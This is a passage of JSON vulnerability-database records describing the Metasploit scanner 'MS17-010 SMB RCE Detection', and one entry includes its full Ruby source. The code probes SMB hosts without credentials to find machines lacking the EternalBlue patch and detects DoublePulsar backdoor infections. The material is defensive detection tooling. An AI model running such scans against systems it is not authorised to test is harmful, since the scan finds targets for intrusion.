"THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-08-20T01:40:28", "rev": 2, "value": 4.4, "vector": "NONE"}}, "hash": "83b3e62281ed9bad0c7de60f0d79b0ce369ad0f18d89e984aa56a55972be8cf8", "hashmap": [{"hash": "a350165a58d78e6a7f1ec63091a5caba", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "35e1b19fef57800a5842324245a84fa8", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "76342054b3e7ed2a9d215428f6b2e311", "key": "title"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "69112e68efb0c9ff708d829d011d07e9", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "52e40933ae55680339314c4c47c4218f", "key": "description"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}], "history": [], "href": "", "id": "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "immutableFields": [], "lastseen": "2020-08-20T01:40:28", "modified": "2020-06-09T12:18:52", "objectVersion": "1.5", "published": "2017-03-29T23:43:49", "references": ["https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/countercept/doublepulsar-detection-script", 
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "title": "MS17-010 SMB RCE Detection", "type": "metasploit", "viewCount": 4179}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2020-08-20T01:40:28"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. 
It can log on as the user \"\\\" and connect to IPC$.\n", "enchantments": {"dependencies": {"modified": "2019-05-29T23:03:37", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["SSV:92952", "SSV:92964"], "type": 
"seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"], "type": "securelist"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["EDB-ID:41987", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", 
"SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "7f41373b73b89844d795a75d968d4fd4", "history": [], "href": "", "id": "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "lastseen": "2019-05-29T23:03:37", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-05-23T19:19:33", "objectVersion": "1.4", "published": "2017-03-29T22:24:59", "references": ["https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/countercept/doublepulsar-detection-script", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Client::PipeAuditor\n\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 SMB RCE Detection',\n 'Description' => %q{\n Uses information disclosure to determine if MS17-010 has been patched or not.\n 
Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\n not have the MS17-010 patch.\n\n If the machine is missing the MS17-010 patch, the module will check for an\n existing DoublePulsar (ring 0 shellcode/malware) infection.\n\n This module does not require valid SMB credentials in default server\n configurations. It can log on as the user \"\\\" and connect to IPC$.\n },\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Luke Jennings' # DoublePulsar detection Python code\n ],\n 'References' =>\n [\n [ 'CVE', '2017-0143'],\n [ 'CVE', '2017-0144'],\n [ 'CVE', '2017-0145'],\n [ 'CVE', '2017-0146'],\n [ 'CVE', '2017-0147'],\n [ 'CVE', '2017-0148'],\n [ 'MSB', 'MS17-010'],\n [ 'URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n [ 'URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']\n ],\n 'License' => MSF_LICENSE,\n 'Notes' =>\n {\n 'AKA' => [\n 'DOUBLEPULSAR',\n 'ETERNALBLUE'\n ]\n }\n ))\n\n register_options(\n [\n OptBool.new('CHECK_DOPU', [false, 'Check for DOUBLEPULSAR on vulnerable hosts', true]),\n OptBool.new('CHECK_ARCH', [false, 'Check for architecture on vulnerable hosts', true]),\n OptBool.new('CHECK_PIPE', [false, 'Check for named pipe on vulnerable hosts', false])\n ])\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 
'x86 (32-bit)' : 'x64 (64-bit)'\n end\n\n def run_host(ip)\n checkcode = Exploit::CheckCode::Unknown\n\n begin\n ipc_share = \"\\\\\\\\#{ip}\\\\IPC$\"\n\n tree_id = do_smb_setup_tree(ipc_share)\n vprint_status(\"Connected to #{ipc_share} with TID = #{tree_id}\")\n\n status = do_smb_ms17_010_probe(tree_id)\n vprint_status(\"Received #{status} with FID = 0\")\n\n if status == \"STATUS_INSUFF_SERVER_RESOURCES\"\n os = simple.client.peer_native_os\n\n if datastore['CHECK_ARCH']\n case dcerpc_getarch\n when ARCH_X86\n os << ' x86 (32-bit)'\n when ARCH_X64\n os << ' x64 (64-bit)'\n end\n end\n\n print_good(\"Host is likely VULNERABLE to MS17-010! - #{os}\")\n\n checkcode = Exploit::CheckCode::Vulnerable\n\n report_vuln(\n host: ip,\n port: rport, # A service is necessary for the analyze command\n name: self.name,\n refs: self.references,\n info: \"STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$ - #{os}\"\n )\n\n # vulnerable to MS17-010, check for DoublePulsar infection\n if datastore['CHECK_DOPU']\n code, signature1, signature2 = do_smb_doublepulsar_probe(tree_id)\n\n if code == 0x51\n xor_key = calculate_doublepulsar_xor_key(signature1).to_s(16).upcase\n arch = calculate_doublepulsar_arch(signature2)\n print_warning(\"Host is likely INFECTED with DoublePulsar! 
- Arch: #{arch}, XOR Key: 0x#{xor_key}\")\n report_vuln(\n host: ip,\n name: \"MS17-010 DoublePulsar Infection\",\n refs: self.references,\n info: \"MultiPlexID += 0x10 on Trans2 request - Arch: #{arch}, XOR Key: 0x#{xor_key}\"\n )\n end\n end\n\n if datastore['CHECK_PIPE']\n pipe_name, _ = check_named_pipes(return_first: true)\n\n return unless pipe_name\n\n print_good(\"Named pipe found: #{pipe_name}\")\n\n report_note(\n host: ip,\n port: rport,\n proto: 'tcp',\n sname: 'smb',\n type: 'MS17-010 Named Pipe',\n data: pipe_name\n )\n end\n elsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\"\n # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)\n print_error(\"Host does NOT appear vulnerable.\")\n else\n print_error(\"Unable to properly detect if host is vulnerable.\")\n end\n\n rescue ::Interrupt\n print_status(\"Exiting on interrupt.\")\n raise $!\n rescue ::Rex::Proto::SMB::Exceptions::LoginError\n print_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\")\n rescue ::Exception => e\n vprint_error(\"#{e.class}: #{e.message}\")\n ensure\n disconnect\n end\n\n checkcode\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n return simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_probe(tree_id)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(tree_id)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def do_smb_ms17_010_probe(tree_id)\n # request transaction with fid = 0\n pkt = make_smb_trans_ms17_010(tree_id)\n sock.put(pkt)\n bytes = 
sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n # convert error code to string\n code = pkt['SMB'].v['ErrorClass']\n smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new\n\n return smberr.get_error(code)\n end\n\n def make_smb_trans2_doublepulsar(tree_id)\n # make a raw transaction packet\n # this one is a trans2 packet, the checker is trans\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x0e = SESSION_SETUP\n setup = \"\\x0e\\x00\\x00\\x00\"\n setup_count = 1 # 1 word\n trans = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['MultiplexID'] = 65\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['Timeout'] = 0x00a4d9a6\n pkt['Payload'].v['ParamCountTotal'] = 12\n pkt['Payload'].v['ParamCount'] = 12\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamOffset'] = 66\n pkt['Payload'].v['DataOffset'] = 78\n\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\n\n def make_smb_trans_ms17_010(tree_id)\n # make a raw transaction packet\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x23 = PeekNamedPipe, fid = 0\n setup = \"\\x23\\x00\\x00\\x00\"\n setup_count = 2 # 2 words\n trans = 
\"\\\\PIPE\\\\\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['ParamCountMax'] = 0xffff\n pkt['Payload'].v['DataCountMax'] = 0xffff\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataOffset'] = data_offset\n\n # actual magic: PeekNamedPipe FID=0, \\PIPE\\\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/smb/smb_ms17_010.rb", "title": "MS17-010 SMB RCE Detection", "type": "metasploit", "viewCount": 3094}, "differentElements": ["cvss", "references", "description", "cvelist", "published", "modified", "sourceHref", "sourceData", "title"], "edition": 21, "lastseen": "2019-05-29T23:03:37"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. 
This module does not require valid SMB credentials in default server configurations. It can log on as the user \"\\\" and connect to IPC$.\n", "enchantments": {"dependencies": {"modified": "2019-12-23T08:55:16", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", 
"THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", 
"RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-12-23T08:55:16", "value": 4.1, "vector": "NONE"}}, "hash": "f29ae96a02a12383c7953b1314397280", "history": [], "href": "", "id": "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "lastseen": "2019-12-23T08:55:16", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-05-23T19:19:33", "objectVersion": "1.4", "published": "2017-03-29T22:24:59", "references": ["https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/countercept/doublepulsar-detection-script", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/smb/smb_ms17_010.rb", "title": "MS17-010 SMB RCE Detection", "type": "metasploit", "viewCount": 3573}, "differentElements": ["sourceData"], "edition": 48, "lastseen": "2019-12-23T08:55:16"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. It can log on as the user \"\\\" and connect to IPC$.\n", "enchantments": {"dependencies": {"modified": "2020-04-12T00:02:58", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", 
